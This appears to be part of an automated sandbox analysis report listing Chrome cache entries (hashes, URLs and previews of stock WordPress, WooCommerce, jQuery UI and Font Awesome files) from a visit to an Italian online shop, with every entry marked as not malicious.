                                                                        Preview:if ('undefined' === typeof BG_SHCE_USE_EFFECTS) {..BG_SHCE_USE_EFFECTS = '0';.} .if ('undefined' === typeof BG_SHCE_TOGGLE_SPEED) {..BG_SHCE_TOGGLE_SPEED = '0';.} .if ('undefined' === typeof BG_SHCE_TOGGLE_OPTIONS) {..BG_SHCE_TOGGLE_OPTIONS = 'swing';.}.if ('undefined' === typeof BG_SHCE_TOGGLE_EFFECT) {..BG_SHCE_TOGGLE_EFFECT = '';.}...function bgExpandCollapsedContent() {..var bgCollapseExpandItems = document.querySelectorAll('input[bg_collapse_expand]');....for ( i=0; i<bgCollapseExpandItems.length; i++) {......var showHideButton = document.getElementById('bg-showmore-action-'+bgCollapseExpandItems[i].value);....var hiddenContent = document.getElementById('bg-showmore-hidden-'+bgCollapseExpandItems[i].value);......if (showHideButton && hiddenContent) {....if (window.addEventListener) {.....showHideButton.addEventListener('click', function(event) {bgExpandCollapsedContentAction(event, this);} );....}....else {.....window.attachEvent("onclick", function(event) {bgExpandCollapsedConten

                                                                        Chrome Cache Entry: 280

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (489)
                                                                        Category:downloaded
                                                                        Size (bytes):675
                                                                        Entropy (8bit):5.107395902267412
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:144E43C3B3D8EA5B278C062C202C92F2
                                                                        SHA1:3C037057A419245849747B4762D09D88CAB66FC1
                                                                        SHA-256:9CD63B8CEA25045C14623C538D26752518A58C0C682795CE6AD3078976C65A37
                                                                        SHA-512:6A95FCAC537F2B1256F2B9E241B92FCEBB214372AFC841FEE2CCD3DD29E8E6CBDDAFA13F08FD1013CEB6C8478B04C5270AA2E4A3C41ABA01A4CEF592EEE35F15
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3
                                                                        Preview:/*!. * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.@font-face{font-family:"Font Awesome 5 Brands";font-style:normal;font-weight:400;font-display:block;src:url(../webfonts/fa-brands-400.eot);src:url(../webfonts/fa-brands-400.eot?#iefix) format("embedded-opentype"),url(../webfonts/fa-brands-400.woff2) format("woff2"),url(../webfonts/fa-brands-400.woff) format("woff"),url(../webfonts/fa-brands-400.ttf) format("truetype"),url(../webfonts/fa-brands-400.svg#fontawesome) format("svg")}.fab{font-family:"Font Awesome 5 Brands";font-weight:400}

                                                                        Chrome Cache Entry: 282

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):942
                                                                        Entropy (8bit):4.559569809574579
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D686970628F1F892E760918CD5702B71
                                                                        SHA1:06344483B5C8889F7CCB45FC21BFB775D4C8C2BF
                                                                        SHA-256:9FA537147EE009FB58DFEC9A2D76529C79405815435EE9A382ABAA4E422490BE
                                                                        SHA-512:5F62CE9347BB6050D1B08E5D562D806179FC36528DF4B1904FE07A01B94DE21B6DEF2CC9CBAD612E55039FA8C87709025513705AE9F8202D1E5C349372679D2E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"fragments":{"div.widget_shopping_cart_content":"<div class=\"widget_shopping_cart_content\">\n <div class=\"ciena-cart-empty-box\">\n <p class=\"woocommerce-mini-cart__empty-icon\"> <svg viewBox=\"0 0 16 16\" class=\" fm-icon fill\">\n <use xlink:href=\"#ico_bag-empty\"><\/use>\n <\/svg>\n <\/p>\n <p class=\"woocommerce-mini-cart__empty-message\">Il tuo carrello \u00e8 vuoto!<\/p>\n <a href=\"https:\/\/annavirgili.com\/shop\/\" class=\"ciena-parent-term-link\" title=\"go to shop\">go to shop <svg viewBox=\"0 0 16 16\" class=\" fm-icon fill\">\n <use xlink:href=\"#ico_next-3\"><\/use>\n <\/svg>\n <\/a> <\/div>\n\n<\/div>",".mini-cart-contents":" <span class=\"mini-cart-contents\">\n <span class=\"count cart-counter\">0 items<span>0<\/span><\/span>\n <\/span>\n "},"cart_hash":""}

                                                                        Chrome Cache Entry: 283

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3129)
                                                                        Category:dropped
                                                                        Size (bytes):14277
                                                                        Entropy (8bit):5.292918573336169
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8690D98E887279F64026F6F97DB7438F
                                                                        SHA1:01CB4B5A3F0B9CEE5E36459EEAC2B02C560A19F2
                                                                        SHA-256:7755717F7D5E20219FEA67955E1669253F800E5B252E9F16DCC185569AE66882
                                                                        SHA-512:90183B42491A4838165B43FCF53C31B7B44E71DD97918D11C0C4CD56E078E8CF69B36E9B662F4AC175245A6D8CEC44FA4EA700F55DEC01F46A9B646496B43B26
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:(function(){. var gt = window.gtranslateSettings || {};. gt = gt[document.currentScript.getAttribute('data-gt-widget-id')] || gt;.. var lang_array_english = {"af":"Afrikaans","sq":"Albanian","am":"Amharic","ar":"Arabic","hy":"Armenian","az":"Azerbaijani","eu":"Basque","be":"Belarusian","bn":"Bengali","bs":"Bosnian","bg":"Bulgarian","ca":"Catalan","ceb":"Cebuano","ny":"Chichewa","zh-CN":"Chinese (Simplified)","zh-TW":"Chinese (Traditional)","co":"Corsican","hr":"Croatian","cs":"Czech","da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto","et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French","fy":"Frisian","gl":"Galician","ka":"Georgian","de":"German","el":"Greek","gu":"Gujarati","ht":"Haitian Creole","ha":"Hausa","haw":"Hawaiian","iw":"Hebrew","hi":"Hindi","hmn":"Hmong","hu":"Hungarian","is":"Icelandic","ig":"Igbo","id":"Indonesian","ga":"Irish","it":"Italian","ja":"Japanese","jw":"Javanese","kn":"Kannada","kk":"Kazakh","km":"Khmer","ko":"Korean","ku":"Kurdish (Kurm

                                                                        Chrome Cache Entry: 284

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):9141
                                                                        Entropy (8bit):5.2975271144294185
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&

                                                                        Chrome Cache Entry: 285

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (729)
                                                                        Category:downloaded
                                                                        Size (bytes):917
                                                                        Entropy (8bit):5.161151260228662
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D1FFC66DD708F7380284F4A6EAA72BD6
                                                                        SHA1:70F0B432E95E80E12E497A7A8DB41D966498D8BC
                                                                        SHA-256:F543270843C5B8DC38E2A5EED2DF19603AC1CF30CED537BC8621520AC9FAE7A9
                                                                        SHA-512:521D7461036C2319D26ABB61CD74F6C800EB10BED26C2EC058D6B3C8D13754ADE74A73EB5FF970ABAAB730BF4DA63D81EC1F1D31245352519D98B9FFFAAB77BC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3
                                                                        Preview:/*!. * jQuery UI Effects Slide 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(d){"use strict";return d.effects.define("slide","show",function(e,t){var i,o,n=d(this),c={up:["bottom","top"],down:["top","bottom"],left:["right","left"],right:["left","right"]},s=e.mode,f=e.direction||"left",l="up"===f||"down"===f?"top":"left",p="up"===f||"left"===f,r=e.distance||n["top"==l?"outerHeight":"outerWidth"](!0),u={};d.effects.createPlaceholder(n),i=n.cssClip(),o=n.position()[l],u[l]=(p?-1:1)*r+o,u.clip=n.cssClip(),u.clip[c[f][1]]=u.clip[c[f][0]],"show"===s&&(n.cssClip(u.clip),n.css(l,u[l]),u.clip=i,u[l]=o),n.animate(u,{queue:!1,duration:e.duration,easing:e.easing,complete:t})})});

                                                                        Chrome Cache Entry: 286

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):707
                                                                        Entropy (8bit):7.4201500949823735
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E4896565595FC22E344FD619C0ED15BB
                                                                        SHA1:43D4481A4CC3E60B406B2467B5F7E576FCBAE260
                                                                        SHA-256:C3A4CB8F32EF0CD89E6429D40D1FAEBD359E02E34D69764052C8402A391E9A00
                                                                        SHA-512:0AB96B0D29EEB56D1BBEF4017DD039701FA85775F50F6B9DCD50FC0D8853228F1AD1FD9A4593D5CF9CE521CF84C31145C10A99588C2D243E114400723E02549C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/en.png
                                                                        Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...IIDATx..]H.Q...g{.95..1....b$.0$.f.}..IE.fA]D.E`..^....J.....R".r..Q.....1?&.........]....s........BJ.j$.+..<W.80.......-..y4l.....c1^<.g..e.Tr...pc7.......(.kIufg+@Z......rbo)E.j.{....}.v.tL6.e{\..Q.gc....W.i.`..=..E.L.......=.......'4..".ef.*v.......`.@.Lp..fCj..!..\.U'...8......7mU.~.m$5.....H.f.HI.............q...b.'"h.)D...#..`.*...........K.....de%+..pW"...._..|Axr....J<....ZHy.....Y.H..%0o%.OM.x.)...0...N...........}.'.......:.w.Qq.Cg.8.k........e...:...U..6.....8y.&.?.....Zvh....KgX..@dq.A...;]HM#...w$.@....j.........@..f.Y....`N..B....j..w.....kXp7....IEND.B`.

                                                                        Chrome Cache Entry: 287

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (6495), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):6495
                                                                        Entropy (8bit):4.754165645836853
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B15EF24270546E5FE896D3EA387EA134
                                                                        SHA1:63910103E8CC5E4BDEB2C289CFBF41F89966EA5B
                                                                        SHA-256:41CE2509FA9959868717986010E16B6334885FD46BC64D0D3C745A73ED3C41E4
                                                                        SHA-512:470850CE2D0487067D847B35F12A8CEC80AA5BF307FC1D7B3E8BA1742BB369441811DC764B858F82484B7993EF1ABD8A6F51489B881A21B3091B066DC4308B40
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundle.min.css?ver=3.3.0
                                                                        Preview:.tooltipster-fall,.tooltipster-grow.tooltipster-show{-webkit-transition-timing-function:cubic-bezier(.175,.885,.32,1);-moz-transition-timing-function:cubic-bezier(.175,.885,.32,1.15);-ms-transition-timing-function:cubic-bezier(.175,.885,.32,1.15);-o-transition-timing-function:cubic-bezier(.175,.885,.32,1.15)}.tooltipster-base{display:flex;pointer-events:none;position:absolute}.tooltipster-box{flex:1 1 auto}.tooltipster-content{box-sizing:border-box;max-height:100%;max-width:100%;overflow:auto}.tooltipster-ruler{bottom:0;left:0;overflow:hidden;position:fixed;right:0;top:0;visibility:hidden}.tooltipster-fade{opacity:0;-webkit-transition-property:opacity;-moz-transition-property:opacity;-o-transition-property:opacity;-ms-transition-property:opacity;transition-property:opacity}.tooltipster-fade.tooltipster-show{opacity:1}.tooltipster-grow{-webkit-transform:scale(0,0);-moz-transform:scale(0,0);-o-transform:scale(0,0);-ms-transform:scale(0,0);transform:scale(0,0);-webkit-transition-property:

                                                                        Chrome Cache Entry: 288

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (375), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):375
                                                                        Entropy (8bit):5.099726776601618
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1EA1DE5C96844259529FF4C5F7A1F8AA
                                                                        SHA1:D97E411804B674D826245B205B661112117FD9EF
                                                                        SHA-256:2F59A26AD63F459E6C627F75609FA938456F24B1CD0EF8B27770165E9A76420D
                                                                        SHA-512:EC9D187A7F722B3EFFC19FE7E06A41702008A1567C7CD2E767650224068055F8ED364C9726EE4885C31EA6666DA3678C48565CDDAC6C0E2A4A1B44C855E89158
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:if(function(){let e=document.createElement("div");e.innerHTML="<div style='display:flex;flex-direction:column;gap:1px;'><div></div><div></div></div>",document.body.appendChild(e);let t=1===e.scrollHeight;return e.remove(),!t}()||window._testFB){let e=document.createElement("script");e.setAttribute("src","/wp-content/uploads/fgfallback.min.js"),document.body.appendChild(e)}

                                                                        Chrome Cache Entry: 289

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (41067)
                                                                        Category:dropped
                                                                        Size (bytes):41171
                                                                        Entropy (8bit):5.038063560031163
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B5C1F83E8E2C9FAD4A9C7A7E8C34B2FA
                                                                        SHA1:A1C7A35489061767940A66B546466FF5212A4625
                                                                        SHA-256:67ADFDAC93B9EC1899CD00E55AC1B217E109DC5B379C3E2940F91F8A64F2DD2F
                                                                        SHA-512:919B2ABE6C3DE18F21CA1C2D59926F0EDA1BC10F692E11750EE22F72A4AEADA71B467E9626CD4887ED387E91FFF1DD4214ACACA7B5C0D6D47401ADA328B4D052
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:// Ion.RangeSlider, 2.3.1, . Denis Ineshin, 2010 - 2019, IonDen.com, Build date: 2019-12-19 16:56:44.!function(i){"undefined"!=typeof jQuery&&jQuery||"function"!=typeof define||!define.amd?"undefined"!=typeof jQuery&&jQuery||"object"!=typeof exports?i(jQuery,document,window,navigator):i(require("jquery"),document,window,navigator):define(["jquery"],function(t){return i(t,document,window,navigator)})}(function(a,c,l,t,_){"use strict";var i,s,o=0,e=(i=t.userAgent,s=/msie\s\d+/i,0<i.search(s)&&s.exec(i).toString().split(" ")[1]<9&&(a("html").addClass("lt-ie9"),!0));Function.prototype.bind||(Function.prototype.bind=function(o){var e=this,h=[].slice;if("function"!=typeof e)throw new TypeError;var r=h.call(arguments,1),n=function(){if(this instanceof n){var t=function(){};t.prototype=e.prototype;var i=new t,s=e.apply(i,r.concat(h.call(arguments)));return Object(s)===s?s:i}return e.apply(o,r.concat(h.call(arguments)))};return n}),Array.prototype.indexOf||(Array.prototype.indexOf=function(t,i

                                                                        Chrome Cache Entry: 291

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (31915)
                                                                        Category:downloaded
                                                                        Size (bytes):39773
                                                                        Entropy (8bit):5.129384739656525
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FC1812C205C79CC9DBB4B9E8D4335226
                                                                        SHA1:B5346EA70F811295DF4227638324BA66B2B108CC
                                                                        SHA-256:C1AFB0DA1D792306039017751FD405AC18E034061A19A1B1170074F66A4714AA
                                                                        SHA-512:9CFB182ED6F05FED5CCEA61B342CE24FC5BFC6A2944C092E34DF3FAE74D14879AF1FC40471633B407BDA3B92B9D39A826AAE20CA4FE357476C9F95C079B831DE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0
                                                                        Preview:"use strict";.!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(this,function(a){function b(a){this.$container,this.constraints=null,this.__$tooltip,this.__init(a)}function c(b,c){var d=!0;return a.each(b,function(a,e){return void 0===c[a]||b[a]!==c[a]?(d=!1,!1):void 0}),d}function d(b){var c=b.attr("id"),d=c?h.window.document.getElementById(c):null;return d?d===b[0]:a.contains(h.window.document.body,b[0])}function e(){if(!g)return!1;var a=g.document.body||g.document.documentElement,b=a.style,c="transition",d=["Moz","Webkit","Khtml","O","ms"];if("string"==typeof b[c])return!0;c=c.charAt(0).toUpperCase()+c.substr(1);for(var e=0;e<d.length;e++)if("string"==typeof b[d[e]+c])return!0;return!1}var f={animation:"fade",animationDuration:350,content:null,contentAsHTML:!1,contentCloning:!1,debug:!0,delay:300,delayTouch:[300,500],functionInit:null,functionBefore:null,functionRea

                                                                        Chrome Cache Entry: 292

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1167
                                                                        Entropy (8bit):4.704672144708603
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AC759E0CC91B5A81999C481AB8EC7C71
                                                                        SHA1:27FAFA683ADF684F70EA3758F19430C17DCE2451
                                                                        SHA-256:04C32A0BBF5F05F007948D07C96A980A9BDB029BEAEFE6CAAB17C982F97F70A4
                                                                        SHA-512:663842DCB931125AC09AB8BEEC6FDCB3C433F6A322FE6C4E950598815FAAF6D3E93D16F4508250C8A4ADF576A4696516F97C480EC5F37486A695ECD8E3755B5E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0
                                                                        Preview:"use strict";.function woof_init_selects() {. . if (woof_select_type == 'chosen') {..jQuery("select.woof_select, select.woof_price_filter_dropdown").chosen();. } else if (woof_select_type == 'selectwoo') {..jQuery("select.woof_select, select.woof_price_filter_dropdown").selectWoo();. }.. jQuery('.woof_select').change(function () {. var slug = jQuery(this).val();. var name = jQuery(this).attr('name');. woof_select_direct_search(this, name, slug);. });.. var containers = jQuery('.woof_hide_empty_container');. jQuery.each(containers, function(i, item){..var selector= jQuery(item).val();..if(selector){.. jQuery(selector).hide();..}... });. .}..function woof_select_direct_search(_this, name, slug) {.. jQuery.each(woof_current_values, function (index, value) {. if (index == name) {. delete woof_current_values[name];. return;. }. });.. if (slug != 0) {. woof_current_values[name] = slug;.

                                                                        Chrome Cache Entry: 293

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 7680 x 4321, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):2768735
                                                                        Entropy (8bit):7.612214171991631
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:70C2D73BD92BDD0CD5C245D5A969DB10
                                                                        SHA1:663487CB9B4E5A33C0B1A53511F5D2DCD0EC1FFC
                                                                        SHA-256:B5324B4AEBAE05525F9056FA04A3FE3EB7287E83F376B272EC9ADBCA3C2B58D5
                                                                        SHA-512:A9A801765DC83D0A60581092204D416CD9C7FA041C65D6762EB13F0802F9E8DF43C7DCDB42BDBC447805BE0D6800B627A29F6E9BD335BDA016AD9FC8D0D7F9A4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-5@4x.png
                                                                        Preview:.PNG........IHDR.............}..6....pHYs..,J..,J.wztM.. .IDATx...[v.:.(XKk......g..SU.*...H<e..'..@.oB../...............................?....~...|..p}..@..z...~..........xA...N....G...7.............ze?.....J..9fg.0....7.~..Y......W..Pz..c.f...g..1....I~............^..GL.}ul..`x.?/.....B....c{....>g.7.7Y...b... i.....W..........?I.........#.G.~.....&......|....X.....{.../.....by...%...I..........y.<R..c~4..>?..e[^.......X.l......d.c<?.N.&...1f_V?..n..p}2>...os..c...W,..Y.Z.Q..x.M.I|MyI..l~.l...............O.|..m;}J...f.}.?..z.*^.z.n.W.?;?.>.?~~>........+{..|T.s5........mo..U.....].2...ht.Y.o.F...Kf...V....P._...:z..[.3...Y.Y}...kw}^..z.{o..Zo.{.Go}...m...Woy.}..|.w<.;^.........6{.jt......~G.w.......f..F......F.....=...?...ef.oso.zro...=..Z.......6z.`.z...Nfu.....qv........O./v......c..z.?.._.....{.....Cz..}...........6.X.c}...G../.^...;.jx...,=..kz..~st}kZ..~f.G.....[:.|./.|?2.o....F.wg...n.N[..:m}+}>M.....V.....V._..K.....sE...D...fz.{.

                                                                        Chrome Cache Entry: 295

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):38464
                                                                        Entropy (8bit):4.6629541485587
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:502B178B099ED4D72DB251553C569536
                                                                        SHA1:9CA686DE040692233D0B7213F26A7EDF3A130B7B
                                                                        SHA-256:8CA6D9CC1522A42C3F686EBB206F9820F3C53EF4A419D28455C0FBB31400F986
                                                                        SHA-512:E1E8DA37C3366176C9ECA54FD770DA092D1F64EA0D0943EE92A38CBA6AFCAF7D97CF5FF6C11C389C2289ACD993C6CB5F1F919FDA82DEDBB62900F890AF63A74D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * perfect-scrollbar v1.5.0. * Copyright 2020 Hyunje Jun, MDBootstrap and Contributors. * Licensed under MIT. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. (global = global || self, global.PerfectScrollbar = factory());.}(this, (function () { 'use strict';.. function get(element) {. return getComputedStyle(element);. }.. function set(element, obj) {. for (var key in obj) {. var val = obj[key];. if (typeof val === 'number') {. val = val + "px";. }. element.style[key] = val;. }. return element;. }.. function div(className) {. var div = document.createElement('div');. div.className = className;. return div;. }.. var elMatches =. typeof Element !== 'undefined' &&. (Element.prototype.matches ||. Element.prototype.webkitMatchesSelector ||. Element.prototype.mozMatchesSele

                                                                        Chrome Cache Entry: 296

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2938), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2938
                                                                        Entropy (8bit):4.989368196764261
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0FD625C3991A4015814CFFDC88E2FC82
                                                                        SHA1:D7C2F53E058210FF3EA773297641008BAB71A5F3
                                                                        SHA-256:2D022DB650D194D935FAEA46A40E5512235B43BC3F8B181E32CE6D3DD745F4E1
                                                                        SHA-512:B936B4E596739DE1FA708A9F439167D4C2E670228A88A803363AA65F061B29DD9F52FDCD5AAB1C1DCBBC634A779E54F767640B2BAF30025130B5EA4FC6169631
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:jQuery(function(r){if("undefined"==typeof wc_cart_fragments_params)return!1;var t=!0,o=wc_cart_fragments_params.cart_hash_key;try{t="sessionStorage"in window&&null!==window.sessionStorage,window.sessionStorage.setItem("wc","test"),window.sessionStorage.removeItem("wc"),window.localStorage.setItem("wc","test"),window.localStorage.removeItem("wc")}catch(f){t=!1}function a(){t&&sessionStorage.setItem("wc_cart_created",(new Date).getTime())}function s(e){t&&(localStorage.setItem(o,e),sessionStorage.setItem(o,e))}var e={url:wc_cart_fragments_params.wc_ajax_url.toString().replace("%%endpoint%%","get_refreshed_fragments"),type:"POST",data:{time:(new Date).getTime()},timeout:wc_cart_fragments_params.request_timeout,success:function(e){e&&e.fragments&&(r.each(e.fragments,function(e,t){r(e).replaceWith(t)}),t&&(sessionStorage.setItem(wc_cart_fragments_params.fragment_name,JSON.stringify(e.fragments)),s(e.cart_hash),e.cart_hash&&a()),r(document.body).trigger("wc_fragments_refreshed"))},error:func

                                                                        Chrome Cache Entry: 299

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (833)
                                                                        Category:downloaded
                                                                        Size (bytes):1020
                                                                        Entropy (8bit):5.252559261946358
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0EDB52E6332AA60CB6A38D303A4F68B4
                                                                        SHA1:2243987D0F7CB01507331B40AD26F0410D40ED91
                                                                        SHA-256:AF0D0BAD3510DB008AC0500B4CA867289F1C93429AE4302A6AD6F8882F416BD3
                                                                        SHA-512:08E1529D9964F67126AB2991AB60395AE5CE76375D961596035435068247C0630B1042143B0AEC304D67A44B56F5A10968AA225C37AE9CE47D841B653390C230
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3
                                                                        Preview:/*!. * jQuery UI Effects Fold 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(m){"use strict";return m.effects.define("fold","hide",function(i,e){var t=m(this),c=i.mode,n="show"===c,c="hide"===c,s=i.size||15,f=/([0-9]+)%/.exec(s),o=!!i.horizFirst?["right","bottom"]:["bottom","right"],a=i.duration/2,u=m.effects.createPlaceholder(t),l=t.cssClip(),r={clip:m.extend({},l)},p={clip:m.extend({},l)},d=[l[o[0]],l[o[1]]],h=t.queue().length;f&&(s=parseInt(f[1],10)/100*d[c?0:1]),r.clip[o[0]]=s,p.clip[o[0]]=s,p.clip[o[1]]=0,n&&(t.cssClip(p.clip),u&&u.css(m.effects.clipToBox(p)),p.clip=l),t.queue(function(e){u&&u.animate(m.effects.clipToBox(r),a,i.easing).animate(m.effects.clipToBox(p),a,i.easing),e()}).animate(r,a,i.easing).animate(p,a,i.easing).queue(e),m.effects

                                                                        Chrome Cache Entry: 300

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (59458)
                                                                        Category:downloaded
                                                                        Size (bytes):81920
                                                                        Entropy (8bit):4.90892866293364
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1564699BC075149206C0C83C941ABF6F
                                                                        SHA1:141285DEFEB0C725B37845B88855344A426D0264
                                                                        SHA-256:045D6DF5C3A944FF7F44220A3B971DCF2455117EBBFA7C6A9E72436495725509
                                                                        SHA-512:A677738F581C58B4EA4A83859313C135346E56FCD9F630A8E9874BCDFD2F98D435170AE01A555D0B90E133CAD48ECACACFC8DB46060B32DB672B61B82AD1B67D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
